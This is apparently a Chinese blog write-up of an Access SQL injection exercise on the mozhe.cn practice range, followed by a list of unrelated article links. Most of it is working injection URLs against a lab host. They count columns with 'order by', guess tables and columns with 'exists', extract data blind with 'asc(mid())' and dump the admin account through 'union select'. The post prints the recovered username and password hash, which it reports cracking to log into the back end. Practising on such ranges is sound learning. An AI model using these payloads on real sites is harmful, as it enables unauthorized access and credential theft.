尝试Access数据库注入实验
靶场环境:https://www.mozhe.cn/bug/detail/82
首先http://219.153.49.228:49543/new_list.asp?id=1 order by 4
到5的时候报错
数据库表有四列
接下来一段一段查:
查询方式如下:
查表:and exists (select * from 表名)
查列:and exists (select 列名 from 表名)
查数据:1.确定长度 2.确定asc数据(asc编码)
and (select top 1 len(列名) from admin)=5
and (select top 1 asc(mid(列名,位数,1)) from admin)=97
and (select top 1 asc(mid(列名,位数,1)) from admin)=97
因此逐步查询后如下:
http://219.153.49.228:49543/new_list.asp?id=1 and exists (select * from admin) √ (这个表名需要猜,简单的靶场一般就是admin)猜错界面会显示为空白,猜正确界面正常显示
http://219.153.49.228:49543/new_list.asp?id=1 and exists (select passwd from admin) √
http://219.153.49.228:49543/new_list.asp?id=1 and exists (select id from admin) √
http://219.153.49.228:49543/new_list.asp?id=1 and exists (select username from admin) √
猜出来以后需要猜username和passwd是orderby的第几列,因为是四个,穷举猜了一下,最后username是第二列,passwd是第三列
http://219.153.49.228:49543/new_list.asp?id=1 union select 1,username,passwd,4 from admin
爆出来账号:moke/7e6ec4fadf84938f cmd5解密后成功登陆后台
感觉Access相比较MySQL更加需要去猜,不像MySQL那样可以有根据的去猜。
最新文章
- Java基础知识笔记(五:多线程的同步问题)
- mvc 导入,导出excel
- 巧用loadrunner代理,录制手机APP脚本
- 深入理解JVM内存模型
- Nullsoft教程 NSIS初学者图文教程一
- [Node.js] Configuring npm package.json scripts
- AngularJS - 基本功能介绍
- PHP面试题之设计模式
- webpack入门笔记
- CoffeeScript 入门笔记
- java数据库编程之高级查询
- 计蒜客NOIP模拟赛4 D1T1 小X的质数
- 学好js的步骤
- phpcms V9 二次开发------(获取点击数详解)
- Java abstract interface与 interface的区别
- 可恶的 0xc0000005异常
- C#-VS远程通信
- 第9月第5天 AVVideoAverageBitRateKey
- #JS 获取屏幕分辨率、网页可见区域等
- 关于 Google 与 Chrome